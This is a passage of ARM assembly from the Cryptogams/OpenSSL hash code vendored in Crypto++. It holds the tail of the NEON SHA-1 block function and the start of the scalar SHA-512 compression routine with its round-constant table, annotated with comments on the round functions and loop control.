eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#16]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q3,q8,#8
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#20]
veor q9,q9,q1
eor r11,r10,r4
add r6,r6,r7,ror#27
veor q9,q9,q10
mov r3,r3,ror#2
add r6,r6,r11
vadd.i32 q13,q8,q14
eor r10,r7,r4
add r5,r5,r9
veor q12,q12,q9
ldr r9,[sp,#24]
eor r11,r10,r3
vshr.u32 q9,q12,#30
add r5,r5,r6,ror#27
mov r7,r7,ror#2
vst1.32 {q13},[r12,:128]!
add r5,r5,r11
eor r10,r6,r3
vsli.32 q9,q12,#2
add r4,r4,r9
ldr r9,[sp,#28]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#32]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
@ Rounds 40..59 use F_40_59 = Maj(b,c,d), computed as (b&c) |
@ ((b^c)&d) via the and/eor/and sequences on r10/r11; rounds 60..79
@ return to the parity form b^c^d.  The NEON schedule continues to
@ produce the last W-words and their W+K sums, reloading q14 with the
@ next K from [r8] as each 20-round phase boundary is crossed.
vext.8 q12,q8,q9,#8
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#36]
veor q10,q10,q2
add r7,r7,r3,ror#27
eor r11,r5,r6
veor q10,q10,q11
add r7,r7,r10
and r11,r11,r4
vadd.i32 q13,q9,q14
mov r4,r4,ror#2
add r7,r7,r11
veor q12,q12,q10
add r6,r6,r9
and r10,r4,r5
vshr.u32 q10,q12,#30
ldr r9,[sp,#40]
add r6,r6,r7,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r4,r5
add r6,r6,r10
vsli.32 q10,q12,#2
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#44]
add r5,r5,r6,ror#27
eor r11,r3,r4
add r5,r5,r10
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#48]
add r4,r4,r5,ror#27
eor r11,r7,r3
add r4,r4,r10
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q12,q9,q10,#8
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#52]
veor q11,q11,q3
add r3,r3,r4,ror#27
eor r11,r6,r7
veor q11,q11,q0
add r3,r3,r10
and r11,r11,r5
vadd.i32 q13,q10,q14
mov r5,r5,ror#2
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r11
veor q12,q12,q11
add r7,r7,r9
and r10,r5,r6
vshr.u32 q11,q12,#30
ldr r9,[sp,#56]
add r7,r7,r3,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r5,r6
add r7,r7,r10
vsli.32 q11,q12,#2
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#60]
add r6,r6,r7,ror#27
eor r11,r4,r5
add r6,r6,r10
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#0]
add r5,r5,r6,ror#27
eor r11,r3,r4
add r5,r5,r10
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q12,q10,q11,#8
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#4]
veor q0,q0,q8
add r4,r4,r5,ror#27
eor r11,r7,r3
veor q0,q0,q1
add r4,r4,r10
and r11,r11,r6
vadd.i32 q13,q11,q14
mov r6,r6,ror#2
add r4,r4,r11
veor q12,q12,q0
add r3,r3,r9
and r10,r6,r7
vshr.u32 q0,q12,#30
ldr r9,[sp,#8]
add r3,r3,r4,ror#27
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
eor r11,r6,r7
add r3,r3,r10
vsli.32 q0,q12,#2
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#12]
add r7,r7,r3,ror#27
eor r11,r5,r6
add r7,r7,r10
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#16]
add r6,r6,r7,ror#27
eor r11,r4,r5
add r6,r6,r10
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q12,q11,q0,#8
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#20]
veor q1,q1,q9
add r5,r5,r6,ror#27
eor r11,r3,r4
veor q1,q1,q2
add r5,r5,r10
and r11,r11,r7
vadd.i32 q13,q0,q14
mov r7,r7,ror#2
add r5,r5,r11
veor q12,q12,q1
add r4,r4,r9
and r10,r7,r3
vshr.u32 q1,q12,#30
ldr r9,[sp,#24]
add r4,r4,r5,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r7,r3
add r4,r4,r10
vsli.32 q1,q12,#2
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#28]
add r3,r3,r4,ror#27
eor r11,r6,r7
add r3,r3,r10
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#32]
add r7,r7,r3,ror#27
eor r11,r5,r6
add r7,r7,r10
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q0,q1,#8
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#36]
veor q2,q2,q10
add r6,r6,r7,ror#27
eor r11,r4,r5
veor q2,q2,q3
add r6,r6,r10
and r11,r11,r3
vadd.i32 q13,q1,q14
mov r3,r3,ror#2
add r6,r6,r11
veor q12,q12,q2
add r5,r5,r9
and r10,r3,r4
vshr.u32 q2,q12,#30
ldr r9,[sp,#40]
add r5,r5,r6,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r3,r4
add r5,r5,r10
vsli.32 q2,q12,#2
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#44]
add r4,r4,r5,ror#27
eor r11,r7,r3
add r4,r4,r10
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#48]
add r3,r3,r4,ror#27
eor r11,r6,r7
add r3,r3,r10
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
@ Rounds 60..79: F reverts to the parity function b^c^d.
vext.8 q12,q1,q2,#8
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#52]
veor q3,q3,q11
eor r11,r10,r5
add r7,r7,r3,ror#27
veor q3,q3,q8
mov r4,r4,ror#2
add r7,r7,r11
vadd.i32 q13,q2,q14
eor r10,r3,r5
add r6,r6,r9
veor q12,q12,q3
ldr r9,[sp,#56]
eor r11,r10,r4
vshr.u32 q3,q12,#30
add r6,r6,r7,ror#27
mov r3,r3,ror#2
vst1.32 {q13},[r12,:128]!
add r6,r6,r11
eor r10,r7,r4
vsli.32 q3,q12,#2
add r5,r5,r9
ldr r9,[sp,#60]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#0]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
vadd.i32 q13,q3,q14
eor r10,r5,r7
add r3,r3,r9
vst1.32 {q13},[r12,:128]!
@ Tail of the per-block loop: while the last 20 scalar rounds run, the
@ NEXT input block is loaded and byte-swapped, its first W+K vectors
@ are precomputed, and r8 is rewound to K_00_19 (sub r8,#16).  "teq
@ r1,r2" detects the final block: in that case r1 is backed up so the
@ speculative loads stay in bounds and sp is restored from r14 below.
sub r12,r12,#64
teq r1,r2
sub r8,r8,#16
it eq
subeq r1,r1,#64
vld1.8 {q0,q1},[r1]!
ldr r9,[sp,#4]
eor r11,r10,r6
vld1.8 {q2,q3},[r1]!
add r3,r3,r4,ror#27
mov r5,r5,ror#2
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r11
eor r10,r4,r6
vrev32.8 q0,q0
add r7,r7,r9
ldr r9,[sp,#8]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#12]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#16]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
vrev32.8 q1,q1
eor r10,r6,r3
add r4,r4,r9
vadd.i32 q8,q0,q14
ldr r9,[sp,#20]
eor r11,r10,r7
vst1.32 {q8},[r12,:128]!
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#24]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#28]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#32]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
vrev32.8 q2,q2
eor r10,r7,r4
add r5,r5,r9
vadd.i32 q9,q1,q14
ldr r9,[sp,#36]
eor r11,r10,r3
vst1.32 {q9},[r12,:128]!
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#40]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#44]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#48]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
vrev32.8 q3,q3
eor r10,r3,r5
add r6,r6,r9
vadd.i32 q10,q2,q14
ldr r9,[sp,#52]
eor r11,r10,r4
vst1.32 {q10},[r12,:128]!
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#56]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#60]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
@ Add this block's result into ctx; on the last block (EQ from the
@ earlier teq r1,r2) restore the caller's sp and fall through to exit,
@ otherwise rewind r12 into the W ring and loop.
ldmia r0,{r9,r10,r11,r12} @ accumulate context
add r3,r3,r9
ldr r9,[r0,#16]
add r4,r4,r10
add r5,r5,r11
add r6,r6,r12
it eq
moveq sp,r14
add r7,r7,r9
it ne
ldrne r9,[sp]
stmia r0,{r3,r4,r5,r6,r7}
itt ne
addne r12,sp,#3*16
bne .Loop_neon
@ vldmia sp!,{d8-d15}
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
.size cryptogams_sha1_block_data_order_neon,.-cryptogams_sha1_block_data_order_neon
#endif
@ ----------------------------------------------------------------------
@ Concatenated-file boundary.  The lines that followed were table-row
@ residue from the extraction ("repo | size | path"); they are preserved
@ here as assembler comments so the file remains assemblable:
@   repo: Akhil-Sharma-26/yeet   size: 42,371
@   path: external/cryptopp/sha512_armv4.S
@ ----------------------------------------------------------------------
@ Copyright 2007-2019 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, MAY 2019: Begin defines taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
# define CRYPTOGAMS_ARMV7_NEON (1<<0)
@ JW, MAY 2019: End defines taken from arm_arch.h
@ Back to original Cryptogams code
#ifdef __ARMEL__
# define LO 0
# define HI 4
# define WORD64(hi0,lo0,hi1,lo1) .word lo0,hi0, lo1,hi1
#else
# define HI 0
# define LO 4
# define WORD64(hi0,lo0,hi1,lo1) .word hi0,lo0, hi1,lo1
#endif
#if defined(__thumb2__)
.syntax unified
.thumb
# define adrl adr
#else
.code 32
#endif
.text
@ SHA-512 round constants K[0..79] (FIPS 180-4), 64 bits each.  The
@ WORD64 macro (defined above) emits the two 32-bit halves in the order
@ matching the target endianness, so [addr+LO]/[addr+HI] always pick
@ the low/high word.  The trailing .skip pads the gap between the table
@ and the function entry; the code below locates the table relative to
@ its own address via "sub r14,r3,#672" (= 80*8 + 32).
.type K512,%object
.align 5
K512:
WORD64(0x428a2f98,0xd728ae22, 0x71374491,0x23ef65cd)
WORD64(0xb5c0fbcf,0xec4d3b2f, 0xe9b5dba5,0x8189dbbc)
WORD64(0x3956c25b,0xf348b538, 0x59f111f1,0xb605d019)
WORD64(0x923f82a4,0xaf194f9b, 0xab1c5ed5,0xda6d8118)
WORD64(0xd807aa98,0xa3030242, 0x12835b01,0x45706fbe)
WORD64(0x243185be,0x4ee4b28c, 0x550c7dc3,0xd5ffb4e2)
WORD64(0x72be5d74,0xf27b896f, 0x80deb1fe,0x3b1696b1)
WORD64(0x9bdc06a7,0x25c71235, 0xc19bf174,0xcf692694)
WORD64(0xe49b69c1,0x9ef14ad2, 0xefbe4786,0x384f25e3)
WORD64(0x0fc19dc6,0x8b8cd5b5, 0x240ca1cc,0x77ac9c65)
WORD64(0x2de92c6f,0x592b0275, 0x4a7484aa,0x6ea6e483)
WORD64(0x5cb0a9dc,0xbd41fbd4, 0x76f988da,0x831153b5)
WORD64(0x983e5152,0xee66dfab, 0xa831c66d,0x2db43210)
WORD64(0xb00327c8,0x98fb213f, 0xbf597fc7,0xbeef0ee4)
WORD64(0xc6e00bf3,0x3da88fc2, 0xd5a79147,0x930aa725)
WORD64(0x06ca6351,0xe003826f, 0x14292967,0x0a0e6e70)
WORD64(0x27b70a85,0x46d22ffc, 0x2e1b2138,0x5c26c926)
WORD64(0x4d2c6dfc,0x5ac42aed, 0x53380d13,0x9d95b3df)
WORD64(0x650a7354,0x8baf63de, 0x766a0abb,0x3c77b2a8)
WORD64(0x81c2c92e,0x47edaee6, 0x92722c85,0x1482353b)
WORD64(0xa2bfe8a1,0x4cf10364, 0xa81a664b,0xbc423001)
WORD64(0xc24b8b70,0xd0f89791, 0xc76c51a3,0x0654be30)
WORD64(0xd192e819,0xd6ef5218, 0xd6990624,0x5565a910)
WORD64(0xf40e3585,0x5771202a, 0x106aa070,0x32bbd1b8)
WORD64(0x19a4c116,0xb8d2d0c8, 0x1e376c08,0x5141ab53)
WORD64(0x2748774c,0xdf8eeb99, 0x34b0bcb5,0xe19b48a8)
WORD64(0x391c0cb3,0xc5c95a63, 0x4ed8aa4a,0xe3418acb)
WORD64(0x5b9cca4f,0x7763e373, 0x682e6ff3,0xd6b2b8a3)
WORD64(0x748f82ee,0x5defb2fc, 0x78a5636f,0x43172f60)
WORD64(0x84c87814,0xa1f0ab72, 0x8cc70208,0x1a6439ec)
WORD64(0x90befffa,0x23631e28, 0xa4506ceb,0xde82bde9)
WORD64(0xbef9a3f7,0xb2c67915, 0xc67178f2,0xe372532b)
WORD64(0xca273ece,0xea26619c, 0xd186b8c7,0x21c0c207)
WORD64(0xeada7dd6,0xcde0eb1e, 0xf57d4f7f,0xee6ed178)
WORD64(0x06f067aa,0x72176fba, 0x0a637dc5,0xa2c898a6)
WORD64(0x113f9804,0xbef90dae, 0x1b710b35,0x131c471b)
WORD64(0x28db77f5,0x23047d84, 0x32caab7b,0x40c72493)
WORD64(0x3c9ebe0a,0x15c9bebc, 0x431d67c4,0x9c100d4c)
WORD64(0x4cc5d4be,0xcb3e42b6, 0x597f299c,0xfc657e2a)
WORD64(0x5fcb6fab,0x3ad6faec, 0x6c44198c,0x4a475817)
.size K512,.-K512
.skip 32
@-----------------------------------------------------------------------
@ void cryptogams_sha512_block_data_order(u64 ctx[8], const u8 *inp,
@                                         size_t nblocks)
@ Scalar SHA-512 compression for 32-bit ARM: every 64-bit quantity is a
@ (lo,hi) register pair accessed via the LO/HI byte offsets defined
@ above.  In: r0 = ctx (a..h), r1 = input, r2 = block count (turned
@ into an end pointer).  r14 walks K512; r3 locates K512 PC-relatively.
@ The sp-based frame mirrors the state b..h at fixed 8-byte slots and
@ grows by 8 per round (sub sp,#8 in the round body), 80*8 in total.
.align 5
.globl cryptogams_sha512_block_data_order
.type cryptogams_sha512_block_data_order,%function
cryptogams_sha512_block_data_order:
.Lcryptogams_sha512_block_data_order:
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r3,pc,#8 @ cryptogams_sha512_block_data_order
#else
adr r3,.Lcryptogams_sha512_block_data_order
#endif
add r2,r1,r2,lsl#7 @ len to point at the end of inp
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
sub r14,r3,#672 @ K512
sub sp,sp,#9*8
@ e is kept live in r7:r8; f, g, h go to the frame each iteration.
ldr r7,[r0,#32+LO]
ldr r8,[r0,#32+HI]
ldr r9, [r0,#48+LO]
ldr r10, [r0,#48+HI]
ldr r11, [r0,#56+LO]
ldr r12, [r0,#56+HI]
.Loop:
str r9, [sp,#48+0]
str r10, [sp,#48+4]
str r11, [sp,#56+0]
str r12, [sp,#56+4]
ldr r5,[r0,#0+LO]
ldr r6,[r0,#0+HI]
ldr r3,[r0,#8+LO]
ldr r4,[r0,#8+HI]
ldr r9, [r0,#16+LO]
ldr r10, [r0,#16+HI]
ldr r11, [r0,#24+LO]
ldr r12, [r0,#24+HI]
str r3,[sp,#8+0]
str r4,[sp,#8+4]
str r9, [sp,#16+0]
str r10, [sp,#16+4]
str r11, [sp,#24+0]
str r12, [sp,#24+4]
ldr r3,[r0,#40+LO]
ldr r4,[r0,#40+HI]
str r3,[sp,#40+0]
str r4,[sp,#40+4]
@ Rounds 0..15: fetch one big-endian 64-bit message word into r3:r4
@ (byte loads pre-ARMv7, ldr+rev otherwise), then one full SHA-512
@ round.  Bit 0 of r14 doubles as an in-band phase flag: when the low
@ byte of K[i].lo equals #148 (the low byte of K[15]'s low word) the
@ flag is set, ending this loop after round 15.
.L00_15:
#if __ARM_ARCH__<7
ldrb r3,[r1,#7]
ldrb r9, [r1,#6]
ldrb r10, [r1,#5]
ldrb r11, [r1,#4]
ldrb r4,[r1,#3]
ldrb r12, [r1,#2]
orr r3,r3,r9,lsl#8
ldrb r9, [r1,#1]
orr r3,r3,r10,lsl#16
ldrb r10, [r1],#8
orr r3,r3,r11,lsl#24
orr r4,r4,r12,lsl#8
orr r4,r4,r9,lsl#16
orr r4,r4,r10,lsl#24
#else
ldr r3,[r1,#4]
ldr r4,[r1],#8
#ifdef __ARMEL__
rev r3,r3
rev r4,r4
#endif
#endif
@ Sigma1(x) (ROTR((x),14) ^ ROTR((x),18) ^ ROTR((x),41))
@ LO lo>>14^hi<<18 ^ lo>>18^hi<<14 ^ hi>>9^lo<<23
@ HI hi>>14^lo<<18 ^ hi>>18^lo<<14 ^ lo>>9^hi<<23
mov r9,r7,lsr#14
str r3,[sp,#64+0]
mov r10,r8,lsr#14
str r4,[sp,#64+4]
eor r9,r9,r8,lsl#18
ldr r11,[sp,#56+0] @ h.lo
eor r10,r10,r7,lsl#18
ldr r12,[sp,#56+4] @ h.hi
eor r9,r9,r7,lsr#18
eor r10,r10,r8,lsr#18
eor r9,r9,r8,lsl#14
eor r10,r10,r7,lsl#14
eor r9,r9,r8,lsr#9
eor r10,r10,r7,lsr#9
eor r9,r9,r7,lsl#23
eor r10,r10,r8,lsl#23 @ Sigma1(e)
adds r3,r3,r9
ldr r9,[sp,#40+0] @ f.lo
adc r4,r4,r10 @ T += Sigma1(e)
ldr r10,[sp,#40+4] @ f.hi
adds r3,r3,r11
ldr r11,[sp,#48+0] @ g.lo
adc r4,r4,r12 @ T += h
ldr r12,[sp,#48+4] @ g.hi
eor r9,r9,r11
str r7,[sp,#32+0]
eor r10,r10,r12
str r8,[sp,#32+4]
and r9,r9,r7
str r5,[sp,#0+0]
and r10,r10,r8
str r6,[sp,#0+4]
eor r9,r9,r11
ldr r11,[r14,#LO] @ K[i].lo
eor r10,r10,r12 @ Ch(e,f,g)
ldr r12,[r14,#HI] @ K[i].hi
adds r3,r3,r9
ldr r7,[sp,#24+0] @ d.lo
adc r4,r4,r10 @ T += Ch(e,f,g)
ldr r8,[sp,#24+4] @ d.hi
adds r3,r3,r11
and r9,r11,#0xff
adc r4,r4,r12 @ T += K[i]
adds r7,r7,r3
ldr r11,[sp,#8+0] @ b.lo
adc r8,r8,r4 @ d += T
teq r9,#148
ldr r12,[sp,#16+0] @ c.lo
#ifdef __thumb2__
it eq @ Thumb2 thing, sanity check in ARM
#endif
orreq r14,r14,#1
@ Sigma0(x) (ROTR((x),28) ^ ROTR((x),34) ^ ROTR((x),39))
@ LO lo>>28^hi<<4 ^ hi>>2^lo<<30 ^ hi>>7^lo<<25
@ HI hi>>28^lo<<4 ^ lo>>2^hi<<30 ^ lo>>7^hi<<25
mov r9,r5,lsr#28
mov r10,r6,lsr#28
eor r9,r9,r6,lsl#4
eor r10,r10,r5,lsl#4
eor r9,r9,r6,lsr#2
eor r10,r10,r5,lsr#2
eor r9,r9,r5,lsl#30
eor r10,r10,r6,lsl#30
eor r9,r9,r6,lsr#7
eor r10,r10,r5,lsr#7
eor r9,r9,r5,lsl#25
eor r10,r10,r6,lsl#25 @ Sigma0(a)
adds r3,r3,r9
and r9,r5,r11
adc r4,r4,r10 @ T += Sigma0(a)
ldr r10,[sp,#8+4] @ b.hi
orr r5,r5,r11
ldr r11,[sp,#16+4] @ c.hi
and r5,r5,r12
and r12,r6,r10
orr r6,r6,r10
orr r5,r5,r9 @ Maj(a,b,c).lo
and r6,r6,r11
adds r5,r5,r3
orr r6,r6,r12 @ Maj(a,b,c).hi
sub sp,sp,#8
adc r6,r6,r4 @ h += T
tst r14,#1
add r14,r14,#8
tst r14,#1
beq .L00_15
@ Prime the schedule for round 16: W[i-15] (frame offsets move by 8
@ each round because sp itself slides), then clear the phase flag.
ldr r9,[sp,#184+0]
ldr r10,[sp,#184+4]
bic r14,r14,#1
@ Rounds 16..79: message expansion W[i] = sigma1(W[i-2]) + W[i-7] +
@ sigma0(W[i-15]) + W[i-16], followed by the same round body as
@ .L00_15.  The loop ends when the low byte of K[i].lo equals #23
@ (the low byte of K[79]'s low word), again signalled via bit 0 of r14.
.L16_79:
@ sigma0(x) (ROTR((x),1) ^ ROTR((x),8) ^ ((x)>>7))
@ LO lo>>1^hi<<31 ^ lo>>8^hi<<24 ^ lo>>7^hi<<25
@ HI hi>>1^lo<<31 ^ hi>>8^lo<<24 ^ hi>>7
mov r3,r9,lsr#1
ldr r11,[sp,#80+0]
mov r4,r10,lsr#1
ldr r12,[sp,#80+4]
eor r3,r3,r10,lsl#31
eor r4,r4,r9,lsl#31
eor r3,r3,r9,lsr#8
eor r4,r4,r10,lsr#8
eor r3,r3,r10,lsl#24
eor r4,r4,r9,lsl#24
eor r3,r3,r9,lsr#7
eor r4,r4,r10,lsr#7
eor r3,r3,r10,lsl#25
@ sigma1(x) (ROTR((x),19) ^ ROTR((x),61) ^ ((x)>>6))
@ LO lo>>19^hi<<13 ^ hi>>29^lo<<3 ^ lo>>6^hi<<26
@ HI hi>>19^lo<<13 ^ lo>>29^hi<<3 ^ hi>>6
mov r9,r11,lsr#19
mov r10,r12,lsr#19
eor r9,r9,r12,lsl#13
eor r10,r10,r11,lsl#13
eor r9,r9,r12,lsr#29
eor r10,r10,r11,lsr#29
eor r9,r9,r11,lsl#3
eor r10,r10,r12,lsl#3
eor r9,r9,r11,lsr#6
eor r10,r10,r12,lsr#6
ldr r11,[sp,#120+0]
eor r9,r9,r12,lsl#26
ldr r12,[sp,#120+4]
adds r3,r3,r9
ldr r9,[sp,#192+0]
adc r4,r4,r10
ldr r10,[sp,#192+4]
adds r3,r3,r11
adc r4,r4,r12
adds r3,r3,r9
adc r4,r4,r10
@ Sigma1(x) (ROTR((x),14) ^ ROTR((x),18) ^ ROTR((x),41))
@ LO lo>>14^hi<<18 ^ lo>>18^hi<<14 ^ hi>>9^lo<<23
@ HI hi>>14^lo<<18 ^ hi>>18^lo<<14 ^ lo>>9^hi<<23
mov r9,r7,lsr#14
str r3,[sp,#64+0]
mov r10,r8,lsr#14
str r4,[sp,#64+4]
eor r9,r9,r8,lsl#18
ldr r11,[sp,#56+0] @ h.lo
eor r10,r10,r7,lsl#18
ldr r12,[sp,#56+4] @ h.hi
eor r9,r9,r7,lsr#18
eor r10,r10,r8,lsr#18
eor r9,r9,r8,lsl#14
eor r10,r10,r7,lsl#14
eor r9,r9,r8,lsr#9
eor r10,r10,r7,lsr#9
eor r9,r9,r7,lsl#23
eor r10,r10,r8,lsl#23 @ Sigma1(e)
adds r3,r3,r9
ldr r9,[sp,#40+0] @ f.lo
adc r4,r4,r10 @ T += Sigma1(e)
ldr r10,[sp,#40+4] @ f.hi
adds r3,r3,r11
ldr r11,[sp,#48+0] @ g.lo
adc r4,r4,r12 @ T += h
ldr r12,[sp,#48+4] @ g.hi
eor r9,r9,r11
str r7,[sp,#32+0]
eor r10,r10,r12
str r8,[sp,#32+4]
and r9,r9,r7
str r5,[sp,#0+0]
and r10,r10,r8
str r6,[sp,#0+4]
eor r9,r9,r11
ldr r11,[r14,#LO] @ K[i].lo
eor r10,r10,r12 @ Ch(e,f,g)
ldr r12,[r14,#HI] @ K[i].hi
adds r3,r3,r9
ldr r7,[sp,#24+0] @ d.lo
adc r4,r4,r10 @ T += Ch(e,f,g)
ldr r8,[sp,#24+4] @ d.hi
adds r3,r3,r11
and r9,r11,#0xff
adc r4,r4,r12 @ T += K[i]
adds r7,r7,r3
ldr r11,[sp,#8+0] @ b.lo
adc r8,r8,r4 @ d += T
teq r9,#23
ldr r12,[sp,#16+0] @ c.lo
#ifdef __thumb2__
it eq @ Thumb2 thing, sanity check in ARM
#endif
orreq r14,r14,#1
@ Sigma0(x) (ROTR((x),28) ^ ROTR((x),34) ^ ROTR((x),39))
@ LO lo>>28^hi<<4 ^ hi>>2^lo<<30 ^ hi>>7^lo<<25
@ HI hi>>28^lo<<4 ^ lo>>2^hi<<30 ^ lo>>7^hi<<25
mov r9,r5,lsr#28
mov r10,r6,lsr#28
eor r9,r9,r6,lsl#4
eor r10,r10,r5,lsl#4
eor r9,r9,r6,lsr#2
eor r10,r10,r5,lsr#2
eor r9,r9,r5,lsl#30
eor r10,r10,r6,lsl#30
eor r9,r9,r6,lsr#7
eor r10,r10,r5,lsr#7
eor r9,r9,r5,lsl#25
eor r10,r10,r6,lsl#25 @ Sigma0(a)
adds r3,r3,r9
and r9,r5,r11
adc r4,r4,r10 @ T += Sigma0(a)
ldr r10,[sp,#8+4] @ b.hi
orr r5,r5,r11
ldr r11,[sp,#16+4] @ c.hi
and r5,r5,r12
